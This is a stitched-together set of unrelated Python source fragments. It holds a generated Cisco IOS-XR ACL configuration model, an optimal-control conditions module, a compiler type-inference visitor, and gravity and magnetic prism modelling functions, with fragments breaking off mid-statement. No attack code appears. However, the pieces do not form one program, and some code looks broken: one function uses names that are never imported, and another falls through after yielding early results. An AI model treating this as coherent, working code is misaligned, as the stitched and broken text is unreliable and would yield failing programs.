+'/Cisco-IOS-XR-ipv4-acl-cfg:time-to-live' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.time_to_live_max is not None: return True if self.time_to_live_min is not None: return True if self.time_to_live_operator is not None: return True return False @staticmethod def _meta_info(): from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_acl_cfg as meta return meta._meta_table['Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.TimeToLive']['meta_info'] class NextHop(object): """ Next\-hop settings. .. attribute:: next_hop_1 The first next\-hop settings **type**\: :py:class:`NextHop1 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop1>` .. attribute:: next_hop_2 The second next\-hop settings **type**\: :py:class:`NextHop2 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop2>` .. 
attribute:: next_hop_3 The third next\-hop settings **type**\: :py:class:`NextHop3 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop3>` .. attribute:: next_hop_type The nexthop type **type**\: :py:class:`NextHopTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_acl_cfg.NextHopTypeEnum>` """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.next_hop_1 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop1() self.next_hop_1.parent = self self.next_hop_2 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop2() self.next_hop_2.parent = self self.next_hop_3 = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.NextHop.NextHop3() self.next_hop_3.parent = self self.next_hop_type = None class NextHop1(object): """ The first next\-hop settings. .. attribute:: next_hop The IPv4 address of the next\-hop **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? .. attribute:: track_name The object tracking name for the next\-hop **type**\: str .. attribute:: vrf_name The VRF name of the next\-hop **type**\: str """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.next_hop = None self.track_name = None self.vrf_name = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:next-hop-1' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.next_hop is not None: return True if self.track_name is
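# A minimal population sketch for the generated leaf containers above (assumption: the
# enclosing Ipv4AclAndPrefixList hierarchy defined earlier in this module is importable;
# the port value is illustrative):
sp = Ipv4AclAndPrefixList.Accesses.Access.AccessListEntries.AccessListEntry.SourcePort()
sp.first_source_port = 22
assert sp.is_config()   # config-side model, always True
assert sp._has_data()   # True once any of the three leaves is set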
<gh_stars>1-10 """ Computes the necessary conditions of optimality using Bryson & Ho's method [1] Bryson, <NAME>. Applied optimal control: optimization, estimation and control. CRC Press, 1975. """ import functools as ft import itertools as it import simplepipe as sp import sympy import re as _re import numpy np = numpy from math import * import numba import beluga from beluga.utils import sympify from beluga.problem import SymVar import sympy as sym from sympy.utilities.lambdify import lambdastr from beluga.utils import keyboard def total_derivative(expr, var, dependent_vars=None): """ Take derivative taking pre-defined quantities into consideration dependent_variables: Dictionary containing dependent variables as keys and their expressions as values """ if dependent_vars is None: dependent_vars = {} dep_var_names = dependent_vars.keys() dep_var_expr = [(expr) for (_,expr) in dependent_vars.items()] dFdq = [sympy.diff(expr, dep_var).subs(dependent_vars.items()) for dep_var in dep_var_names] dqdx = [sympy.diff(qexpr, var) for qexpr in dep_var_expr] # Chain rule + total derivative out = sum(d1*d2 for d1,d2 in zip(dFdq, dqdx)) + sympy.diff(expr, var) return out def jacobian(expr_list, var_list, derivative_fn): jac = sympy.zeros(len(expr_list), len(var_list)) for i, expr in enumerate(expr_list): for j, var in enumerate(var_list): jac[i, j] = derivative_fn(expr, var) return jac def process_quantities(quantities): """Performs preprocessing on quantity definitions. Creates a new total derivative operator that takes considers these definitions. """ # logging.info('Processing quantity expressions') # TODO: Sanitize quantity expressions # TODO: Check for circular references in quantity expressions # Trivial case when no quantities are defined if len(quantities) == 0: yield {} yield [] yield total_derivative yield ft.partial(jacobian, derivative_fn=total_derivative) quantity_subs = [(q.name, q.value) for q in quantities] quantity_sym, quantity_expr = zip(*quantity_subs) quantity_expr = [qty_expr.subs(quantity_subs) for qty_expr in quantity_expr] # Use substituted expressions to recreate quantity expressions quantity_subs = [(str(qty_var),qty_expr) for qty_var, qty_expr in zip(quantity_sym, quantity_expr)] # Dictionary for substitution quantity_vars = dict(quantity_subs) # Dictionary for use with mustache templating library quantity_list = [{'name':str(qty_var), 'expr':str(qty_expr)} for qty_var, qty_expr in zip(quantity_sym, quantity_expr)] # Function partial that takes derivative while considering quantities derivative_fn = ft.partial(total_derivative, dependent_vars=quantity_vars) jacobian_fn = ft.partial(jacobian, derivative_fn=derivative_fn) yield quantity_vars yield quantity_list yield derivative_fn yield jacobian_fn def make_augmented_cost(cost, constraints, location): """Augments the cost function with the given list of constraints. 
Returns the augmented cost function """ def make_lagrange_mult(c, ind = 1): return sympify('lagrange_' + location + '_' + str(ind)) lagrange_mult = [make_lagrange_mult(c, ind) for (ind,c) in enumerate(constraints[location],1)] aug_cost_expr = cost.expr + sum(nu * c for (nu, c) in zip(lagrange_mult, constraints[location])) aug_cost = SymVar({'expr':aug_cost_expr, 'unit': cost.unit}, sym_key='expr') return aug_cost # yield aug_cost # yield lagrange_mult def make_aug_params(constraints, location): """Make the lagrange multiplier terms for boundary conditions.""" def make_lagrange_mult(c, ind = 1): return sympify('lagrange_' + location + '_' + str(ind)) lagrange_mult = [make_lagrange_mult(c, ind) for (ind,c) in enumerate(constraints[location],1)] return lagrange_mult def make_hamiltonian_and_costate_rates(states, costate_names, path_cost, derivative_fn): """simplepipe task for creating the hamiltonian and costates Workspace variables ------------------- states - list of dict List of "sympified" states path_cost - Object representing the path cost terminal Returns the hamiltonian and the list of costates """ ham = path_cost.expr + sum([lam*s.eom for s, lam in zip(states, costate_names)]) yield ham yield make_costate_rates(ham, states, costate_names, derivative_fn) def make_costate_names(states): return [sympify('lam'+str(s.name).upper()) for s in states] def make_costate_rates(ham, states, costate_names, derivative_fn): """Make costates.""" costates = [SymVar({'name': lam, 'eom':derivative_fn(-1*(ham), s)}) for s, lam in zip(states, costate_names)] return costates def sanitize_constraint_expr(constraint, states, location, prefix_map ): """ Checks the initial/terminal constraint expression for invalid symbols Also updates the constraint expression to reflect what would be in code """ if location not in prefix_map: raise ValueError('Invalid constraint type') pattern, prefix, _ = dict(prefix_map)[location] m = _re.findall(pattern,str(constraint.expr)) invalid = [x for x in m if x not in states] if not all(x is None for x in invalid): raise ValueError('Invalid expression(s) in boundary constraint:\n'+str([x for x in invalid if x is not None])) return _re.sub(pattern,prefix,str(constraint.expr)) def make_boundary_conditions(constraints, states, costates, cost, derivative_fn, location, prefix_map=(('initial',(r'([\w\d\_]+)_0', r"_x0['\1']", sympify('-1'))), ('terminal',(r'([\w\d\_]+)_f', r"_xf['\1']", sympify('1'))))): """simplepipe task for creating boundary conditions for initial and terminal constraints.""" prefix_map = dict(prefix_map) bc_list = [sanitize_constraint_expr(x, states, location, prefix_map) for x in constraints[location]] *_, sign = dict(prefix_map)[location] cost_expr = sign * cost #TODO: Fix hardcoded if conditions #TODO: Change to symbolic bc_list += [str(costate - derivative_fn(cost_expr, state)) for state, costate in zip(states, costates)] return bc_list def make_time_bc(constraints, bc_terminal): """Makes free or fixed final time boundary conditions.""" time_constraints = constraints.get('independent', []) if len(time_constraints) > 0: return bc_terminal+['tf - 1'] else: # Add free final time boundary condition return bc_terminal+['_H - 0'] def make_dhdu(ham, controls, derivative_fn): """Computes the partial of the hamiltonian w.r.t control variables.""" dhdu = [] for ctrl in controls: dHdu = derivative_fn(ham, ctrl) custom_diff = dHdu.atoms(sympy.Derivative) # Substitute "Derivative" with complex step derivative repl = {(d,im(f.func(v+1j*1e-30))/1e-30) for d in custom_diff for 
f,v in zip(d.atoms(sympy.AppliedUndef),d.atoms(Symbol))} dhdu.append(dHdu.subs(repl)) return dhdu import logging def make_control_law(dhdu, controls): """Solves control equation to get control law.""" try: print(controls) var_list = list(controls) logging.info("Attempting using SymPy ...") logging.debug("dHdu = "+str(dhdu)) ctrl_sol = sympy.solve(dhdu, var_list, dict=True) # raise ValueError() # Force mathematica except ValueError as e: # FIXME: Use right exception name here logging.debug(e) logging.info("No control law found") from beluga.utils_old.pythematica import mathematica_solve logging.info("Attempting using Mathematica ...") var_sol = mathematica_solve(dhdu,var_list) # TODO: Extend numerical control laws to mu's ctrl_sol = var_sol print('Control found') print(ctrl_sol) # ctrl_sol = sympy.solve(dhdu, controls, dict=True) # control_options = [ [{'name':str(ctrl), 'expr':str(expr)} # for (ctrl,expr) in option.items()] # for option in ctrl_sol] control_options = ctrl_sol return control_options def process_constraint(s, s_idx, states, costates, controls, ham, quantity_vars, jacobian_fn, derivative_fn, max_iter=5): """Processes one constraint expression to create constrained control eqn, constrained arc bc function""" print('Processing constraint: ',s.name) s_bound = sympy.sympify(s.name) s_q = sympy.Matrix([s.expr - s_bound]) control_found = False order = 0 found = False num_states = len(states) stateAndLam = [*states, *costates] stateAndLamDot = [s.eom*sympify('tf') for s in it.chain(states, costates)] stateAndLamDot = [s.eom for s in it.chain(states, costates)] costate_names = make_costate_names(states) ham_mat = sympy.Matrix([ham]) mult = sympy.symbols('_mu'+str(s_idx)) tangency = [] for i in range(max_iter): s_q = s_q.subs(quantity_vars) control_found = any(u in s_q.free_symbols for u in controls) if control_found: print('Constraint',s.name,'is of order',order) found = True ham_aug = ham_mat + mult*s_q # Augmented hamiltonian lamdot_aug = - mult * jacobian_fn(s_q, states) # Augmented costate equations in constrained arc # First solve for controls and then for mu dh_du = jacobian_fn(ham_aug, [*controls, mult]) u_sol_list = make_control_law(dh_du[1], controls) mu_sol_list = [] constrained_control_law = [] for u_sol in u_sol_list: mu_sol = make_control_law(dh_du[0].subs(u_sol), [mult]) control_law = {**u_sol, **mu_sol[0]} constrained_control_law.append(control_law) from beluga.utils import keyboard # keyboard() # constrained_control_law = make_control_law(dhdu, [*controls, mult]) constrained_costate_rates = make_costate_rates(ham_aug[0], states, costate_names, derivative_fn) break tangency.append(s_q[0]) s_q = jacobian_fn(s_q, stateAndLam)*sympy.Matrix([stateAndLamDot]).T order += 1 N_x = jacobian_fn(sympy.Matrix(tangency), states) # print(sympy.Matrix(N_x)) if order > 0: pi_list = sympy.symbols('pi'+str(s_idx)+':'+str(len(tangency))) corner_conditions = sympy.Matrix([pi_list]) * N_x else: pi_list = [] corner_conditions = sympy.Matrix([0]*len(costates)).T if not found: raise Exception("Invalid path constrant") return constrained_control_law, constrained_costate_rates, ham_aug[0], order, mult, pi_list, corner_conditions, tangency def process_path_constraints(path_constraints, states, costates, constants, controls, ham, quantity_vars, jacobian_fn, derivative_fn): s_list = [] mu_vars = [] for i, s in enumerate(path_constraints): u_aug, lamdot, ham_aug, order, mu_i, pi_list, corner_conditions, tangency = \ process_constraint(s, i, states, costates, controls, ham, quantity_vars, 
jacobian_fn, derivative_fn) s_list.append({'name': str(s['name']), 'expr': str(s['expr'].subs(quantity_vars)), 'unit': str(s['unit']), 'direction': s['direction'], 'control_law': u_aug, 'lamdot': lamdot, 'ham': ham_aug, 'order': order, 'mu': mu_i, 'pi_list': pi_list, 'corner': corner_conditions, 'tangency': tangency, 'bound_val': s['bound']}) mu_vars.append(mu_i) yield s_list yield mu_vars def make_parameters(initial_lm_params, terminal_lm_params, s_list): all_pi_names = [p['pi_list'] for p in s_list] params_list = [str(p) for p in it.chain(initial_lm_params, terminal_lm_params)] #, *all_pi_names)] parameters = sym.symbols(' '.join(params_list)) return parameters def make_constraint_bc(s, states, costates, parameters, constants, controls, mu_vars, quantity_vars, ham): num_states = len(states) costate_slice = slice(num_states, 2*num_states) ham_aug = s['ham'] corner_conditions = s['corner'] tangency = s['tangency'] tf_var = sympify('tf') y1m = sympy.symbols(' '.join('_'+str(_.name)+'_1m' for _ in it.chain(states, costates, [tf_var]))) y1m_x = sympy.Matrix([y1m[:num_states]]) y1m_l = sympy.Matrix([y1m[costate_slice]]) y1p = sympy.symbols(' '.join('_'+str(_.name)+'_1p' for _ in it.chain(states, costates, [tf_var]))) y1p_x = sympy.Matrix([y1p[:num_states]]) y1p_l = sympy.Matrix([y1p[costate_slice]]) y2m = sympy.symbols(' '.join('_'+str(_.name)+'_2m' for _ in it.chain(states, costates, [tf_var]))) y2p = sympy.symbols(' '.join('_'+str(_.name)+'_2p' for _ in it.chain(states, costates, [tf_var]))) y2m = sympy.Matrix([y2m]) y2p = sympy.Matrix([y2p]) u_m = sympy.symbols(' '.join('_'+str(_.name)+'_m' for _ in it.chain(controls, mu_vars))) u_p = sympy.symbols(' '.join('_'+str(_.name)+'_p' for _ in it.chain(controls, mu_vars))) if not hasattr(u_m, '__len__'): u_m = (u_m,) if not hasattr(u_p, '__len__'): u_p = (u_p,) def make_subs(in_vars, out_vars): return {k: v for k,v in zip(in_vars, out_vars)} subs_1m = make_subs(it.chain(states, costates, [tf_var], controls,
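# A small illustration of total_derivative with a registered quantity (the symbols are
# chosen for this sketch only): with q defined as x**2, the total derivative of q + x
# with respect to x is 2*x + 1.
import sympy
_x, _q = sympy.symbols('x q')
print(total_derivative(_q + _x, _x, dependent_vars={_q: _x**2}))  # prints 2*x + 1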
from ..parser import ast from .definitions import GenericType from .generics import TypeVisitor from .generics import add_generic_class from .generics import fix_chosen_types from .generics import replace_generic_types from .utils import BUILTIN_CALLS from .utils import BUILTIN_ERRORS from .utils import BYTES_METHODS from .utils import LIST_METHODS from .utils import NUMBER_TYPES from .utils import OPERATORS_TO_METHOD from .utils import REGEX_METHODS from .utils import REGEXMATCH_METHODS from .utils import SET_METHODS from .utils import STRING_METHODS from .utils import CompileError from .utils import InternalError from .utils import is_primitive_type from .utils import is_snake_case from .utils import make_integer_literal from .utils import raise_if_types_differs from .utils import split_dict_mys_type def mys_to_value_type(mys_type): if isinstance(mys_type, tuple): return tuple(mys_to_value_type(item) for item in mys_type) elif isinstance(mys_type, list): return [mys_to_value_type(item) for item in mys_type] elif isinstance(mys_type, dict): key_mys_type, value_mys_type = split_dict_mys_type(mys_type) return Dict(mys_to_value_type(key_mys_type), mys_to_value_type(value_mys_type)) elif isinstance(mys_type, set): return Set(mys_to_value_type(list(mys_type)[0])) else: return mys_type def format_value_type(value_type): if isinstance(value_type, tuple): if len(value_type) == 1: items = f'{format_value_type(value_type[0])}, ' else: items = ', '.join([format_value_type(item) for item in value_type]) return f'({items})' elif isinstance(value_type, list): if len(value_type) == 1: return f'[{format_value_type(value_type[0])}]' else: return '/'.join([format_value_type(item) for item in value_type]) elif isinstance(value_type, dict): raise Exception('not implemented') else: return value_type def intersection_of(type_1, type_2, node): """Find the intersection of given visited types. 
""" if type_1 is None: if is_primitive_type(type_2): raise CompileError(f"'{type_2}' cannot be None", node) else: return type_2, type_2 elif type_2 is None: if is_primitive_type(type_1): raise CompileError(f"'{type_1}' cannot be None", node) else: return type_1, type_1 elif type_1 == type_2: return type_1, type_2 elif isinstance(type_1, str) and isinstance(type_2, str): raise_if_types_differs(type_1, type_2, node) elif isinstance(type_1, tuple) and isinstance(type_2, tuple): if len(type_1) != len(type_2): return None, None else: new_type_1 = [] new_type_2 = [] for item_type_1, item_type_2 in zip(type_1, type_2): item_type_1, item_type_2 = intersection_of(item_type_1, item_type_2, node) if item_type_1 is None or item_type_2 is None: return None, None new_type_1.append(item_type_1) new_type_2.append(item_type_2) return tuple(new_type_1), tuple(new_type_2) elif isinstance(type_1, Set) and isinstance(type_2, Set): value_type_1, value_type_2 = intersection_of(type_1.value_type, type_2.value_type, node) return Set(value_type_1), Set(value_type_2) elif isinstance(type_1, Set) and isinstance(type_2, Dict): if type_2.key_type is not None or type_2.value_type is not None: raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) return type_1, type_1 elif isinstance(type_1, Dict) and isinstance(type_2, Dict): if type_1.key_type is None and type_2.key_type is not None: type_1.key_type = type_2.key_type elif type_1.key_type is not None and type_2.key_type is None: type_2.key_type = type_1.key_type key_value_type_1, key_value_type_2 = intersection_of(type_1.key_type, type_2.key_type, node) if type_1.value_type is None and type_2.value_type is not None: type_1.value_type = type_2.value_type elif type_1.value_type is not None and type_2.value_type is None: type_2.value_type = type_1.value_type value_value_type_1, value_value_type_2 = intersection_of(type_1.value_type, type_2.value_type, node) return (Dict(key_value_type_1, value_value_type_1), Dict(key_value_type_2, value_value_type_2)) elif isinstance(type_1, str): if not isinstance(type_2, list): return None, None elif type_1 not in type_2: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: return type_1, type_1 elif isinstance(type_2, str): if not isinstance(type_1, list): return None, None elif type_2 not in type_1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: return type_2, type_2 elif isinstance(type_1, list) and isinstance(type_2, list): if len(type_1) == 0 and len(type_2) == 0: return [], [] elif len(type_1) == 1 and len(type_2) == 1: item_type_1, item_type_2 = intersection_of(type_1[0], type_2[0], node) return [item_type_1], [item_type_2] elif len(type_1) == 1 and len(type_2) == 0: return type_1, type_1 elif len(type_2) == 1 and len(type_1) == 0: return type_2, type_2 elif len(type_1) == 1 and len(type_2) > 1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) elif len(type_2) == 1 and len(type_1) > 1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: new_type_1 = [] new_type_2 = [] for item_type_1 in type_1: for item_type_2 in type_2: if isinstance(item_type_1, str) and isinstance(item_type_2, str): if item_type_1 != item_type_2: continue else: item_type_1, 
item_type_2 = intersection_of(item_type_1, item_type_2, node) if item_type_1 is None or item_type_2 is None: continue new_type_1.append(item_type_1) new_type_2.append(item_type_2) if len(new_type_1) == 0: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) elif len(new_type_1) == 1: return new_type_1[0], new_type_2[0] else: return new_type_1, new_type_2 else: raise InternalError(f"specialize types {type_1}, {type_2}", node) def reduce_type(value_type): if isinstance(value_type, list): if len(value_type) == 0: return ['bool'] elif len(value_type) == 1: return [reduce_type(value_type[0])] else: return reduce_type(value_type[0]) elif isinstance(value_type, tuple): values = [] for item in value_type: values.append(reduce_type(item)) return tuple(values) elif isinstance(value_type, str): return value_type elif isinstance(value_type, Dict): return {reduce_type(value_type.key_type): reduce_type(value_type.value_type)} elif isinstance(value_type, Set): return {reduce_type(value_type.value_type)} elif value_type is None: return None else: raise Exception("Bad reduce") class Set: def __init__(self, value_type): self.value_type = value_type def __str__(self): return f'Set({self.value_type})' class Dict: def __init__(self, key_type, value_type): self.key_type = key_type self.value_type = value_type def __str__(self): return f'Dict({self.key_type}, {self.value_type})' class ValueTypeVisitor(ast.NodeVisitor): """Find the type of given value. """ def __init__(self, context): self.context = context self.factor = 1 def visit_BoolOp(self, _node): return 'bool' def visit_JoinedStr(self, _node): return 'string' def visit_Compare(self, _node): return 'bool' def visit_BinOp(self, node): left_value_type = self.visit(node.left) right_value_type = self.visit(node.right) if self.context.is_class_defined(left_value_type): method = self.find_operator_method(left_value_type, OPERATORS_TO_METHOD[type(node.op)], node) return method.returns if right_value_type == 'string': return 'string' elif left_value_type == 'string': return 'string' else: return intersection_of(left_value_type, right_value_type, node)[0] def visit_Slice(self, node): lower = None upper = None step = None if node.lower: lower = self.visit(node.lower) if node.upper: upper = self.visit(node.upper) if node.step: step = self.visit(node.step) return lower, upper, step def visit_Subscript(self, node): value_type = mys_to_value_type(self.visit(node.value)) if isinstance(value_type, list): value_type = value_type[0] elif isinstance(value_type, tuple): index = make_integer_literal('i64', node.slice) value_type = value_type[int(index)] elif isinstance(value_type, Dict): value_type = value_type.value_type elif value_type == 'string': slice_type = self.visit(node.slice) if isinstance(slice_type, tuple): value_type = 'string' else: value_type = 'char' elif value_type == 'bytes': value_type = 'u8' else: raise Exception('todo') return value_type def visit_IfExp(self, node): return self.visit(node.body) def visit_Attribute(self, node): name = node.attr if isinstance(node.value, ast.Name): value = node.value.id if self.context.is_enum_defined(value): value_type = self.context.make_full_name(value) elif self.context.is_local_variable_defined(value): value_type = self.context.get_local_variable_type(value) elif self.context.is_global_variable_defined(value): value_type = self.context.get_global_variable_type(value) else: raise InternalError("attribute", node) else: value_type = 
self.visit(node.value) if self.context.is_class_defined(value_type): definitions = self.context.get_class_definitions(value_type) if name in definitions.members: value_type = definitions.members[name].type else: raise CompileError( f"class '{value_type}' has no member '{name}'", node) if isinstance(value_type, dict): value_type = Dict(list(value_type.keys())[0], list(value_type.values())[0]) elif isinstance(value_type, set): value_type = Set(list(value_type)[0]) return value_type def visit_UnaryOp(self, node): if isinstance(node.op, ast.USub): factor = -1 else: factor = 1 self.factor *= factor value = self.visit(node.operand) self.factor *= factor return value def visit_Constant(self, node): if isinstance(node.value, bool): return 'bool' elif isinstance(node.value, int): types = ['i64', 'i32', 'i16', 'i8'] if self.factor == 1: types += ['u64', 'u32', 'u16', 'u8'] return types elif isinstance(node.value, float): return ['f64', 'f32'] elif isinstance(node.value, str): return 'string' elif isinstance(node.value, bytes): return 'bytes' elif isinstance(node.value, tuple): if len(node.value) == 2: return 'regex' elif len(node.value) == 3: return 'char' else: raise Exception('todo') elif isinstance(node.value, complex): raise CompileError('complex numbers are not supported', node) elif node.value is None: return None else: raise Exception('todo') def visit_Name(self, node): name = node.id if name == '__unique_id__': return 'i64' elif name == '__line__': return 'u64' elif name == '__name__': return 'string' elif name == '__file__': return 'string' elif name == '__version__': return 'string' elif self.context.is_local_variable_defined(name): value_type = self.context.get_local_variable_type(name) return mys_to_value_type(value_type) elif self.context.is_global_variable_defined(name): value_type = self.context.get_global_variable_type(name) return mys_to_value_type(value_type) else: raise CompileError(f"undefined variable '{name}'", node) def visit_List(self, node): if len(node.elts) == 0: return [] item_type = self.visit(node.elts[0]) for item in node.elts[1:]: item_type, _ = intersection_of(item_type, self.visit(item), item) return [item_type] def visit_Tuple(self, node): return tuple(self.visit(elem) for elem in node.elts) def visit_Dict(self, node): if len(node.keys) > 0: return Dict(self.visit(node.keys[0]), self.visit(node.values[0])) else: return Dict(None, None) def visit_Set(self, node): if len(node.elts) == 0: return Set([]) item_type = self.visit(node.elts[0]) for item in node.elts[1:]: item_type, _ = intersection_of(item_type, self.visit(item), item) return Set(item_type) def visit_call_params_keywords(self, function, node): keyword_args = {} params = {param.name for param, _ in function.args} positional_params_names = [ param.name for param, _ in function.args[:len(node.args)] ] if node.keywords: for keyword in node.keywords: param_name = keyword.arg if param_name not in params: return None if param_name in positional_params_names: return None if param_name in keyword_args: return None keyword_args[param_name] = keyword.value return keyword_args def visit_call_params(self, function, node): """Returns true if given function can be called with given parameters, false otherwise. 
""" keyword_args = self.visit_call_params_keywords(function, node) if keyword_args is None: return False for i, (param, default) in enumerate(function.args): if i < len(node.args): try: intersection_of(self.visit(node.args[i]), param.type, node) except CompileError: return False else: value = keyword_args.get(param.name) if value is None: if default is
in prisms: if prism is None or ('density' not in prism.props and dens is None): continue if dens is None: density = prism.props['density'] else: density = dens x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.gyz(xp, yp, zp, x1, x2, y1, y2, z1, z2, density, res) res *= G * SI2EOTVOS return res def gzz(xp, yp, zp, prisms, dens=None): """ Calculates the :math:`g_{zz}` gravity gradient tensor component. .. note:: The coordinate system of the input parameters is to be x -> North, y -> East and z -> **DOWN**. .. note:: All input values in **SI** units(!) and output in **Eotvos**! Parameters: * xp, yp, zp : arrays Arrays with the x, y, and z coordinates of the computation points. * prisms : list of :class:`~fatiando.mesher.Prism` The density model used to calculate the gravitational effect. Prisms must have the property ``'density'``. Prisms that don't have this property will be ignored in the computations. Elements of *prisms* that are None will also be ignored. *prisms* can also be a :class:`~fatiando.mesher.PrismMesh`. * dens : float or None If not None, will use this value instead of the ``'density'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * res : array The field calculated on xp, yp, zp """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same length!") size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if prism is None or ('density' not in prism.props and dens is None): continue if dens is None: density = prism.props['density'] else: density = dens x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.gzz(xp, yp, zp, x1, x2, y1, y2, z1, z2, density, res) res *= G * SI2EOTVOS return res def tf(xp, yp, zp, prisms, inc, dec, pmag=None): """ Calculate the total-field magnetic anomaly of prisms. .. note:: Input units are SI. Output is in nT .. note:: The coordinate system of the input parameters is to be x -> North, y -> East and z -> Down. Parameters: * xp, yp, zp : arrays Arrays with the x, y, and z coordinates of the computation points. * prisms : list of :class:`~fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. *prisms* can also be a :class:`~fatiando.mesher.PrismMesh`. * inc : float The inclination of the regional field (in degrees) * dec : float The declination of the regional field (in degrees) * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. 
Returns: * res : array The field calculated on xp, yp, zp """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same length!") size = len(xp) res = numpy.zeros(size, dtype=numpy.float) # Calculate the 3 components of the unit vector in the direction of the # regional field fx, fy, fz = utils.dircos(inc, dec) if pmag is not None: if isinstance(pmag, float) or isinstance(pmag, int): mx, my, mz = pmag * fx, pmag * fy, pmag * fz else: mx, my, mz = pmag for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mag = prism.props['magnetization'] if isinstance(mag, float) or isinstance(mag, int): mx, my, mz = mag * fx, mag * fy, mag * fz else: mx, my, mz = mag x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.tf(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, fx, fy, fz, res) res *= CM * T2NT return res def bx(xp, yp, zp, prisms, pmag=None): """ Calculates the x component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * bx: array The x component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.bx(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, res) res *= CM * T2NT return res def by(xp, yp, zp, prisms, pmag=None): """ Calculates the y component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. 
Returns: * by: array The y component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.by(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, res) res *= CM * T2NT return res def bz(xp, yp, zp, prisms, pmag=None): """ Calculates the z component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, 